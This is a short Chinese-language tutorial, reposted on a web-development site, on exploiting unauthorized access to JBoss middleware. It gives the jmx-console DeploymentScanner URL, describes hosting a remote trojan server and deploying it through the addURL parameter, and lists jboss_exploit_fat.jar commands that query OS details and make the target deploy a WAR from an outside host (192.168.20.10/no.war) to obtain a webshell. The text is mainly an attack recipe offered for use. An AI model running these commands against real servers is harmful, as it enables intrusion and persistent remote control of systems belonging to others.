分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 运营维护

WEB中间件--Jboss未授权访问,

发布时间:2023-09-06 01:51责任编辑:郭大石关键词:暂无标签

1,Jboss未授权访问部署木马

发现存在Jboss默认页面,点进控制页

点击 Jboss.deployment 进入应用部署页面
也可以直接输入此URL进入

http://www.ctfswiki.com:8080//jmxconsole/HtmlAdaptoraction=inspectMBean&name=jboss.deployment:type=DeploymentScanner,flavor=URL


搭建远程木马服务器,可以用apache等web服务器来搭建,通过addurl参数进行木马的远程部署

部署成功,访问木马地址

最后附上一个jboss未授权访问EXP,备用,使用说明

1. 查看系统名称java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName2. 查看系统版本java -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion3.远程部署warjava -jar jboss_exploit_fat.jar -i http://www.any.com:8080/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://192.168.20.10/no.war获得shell地址:www.any.com:8080/no/index.jsp

WEB中间件--Jboss未授权访问,

原文地址:https://www.cnblogs.com/hackxf/p/8951699.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved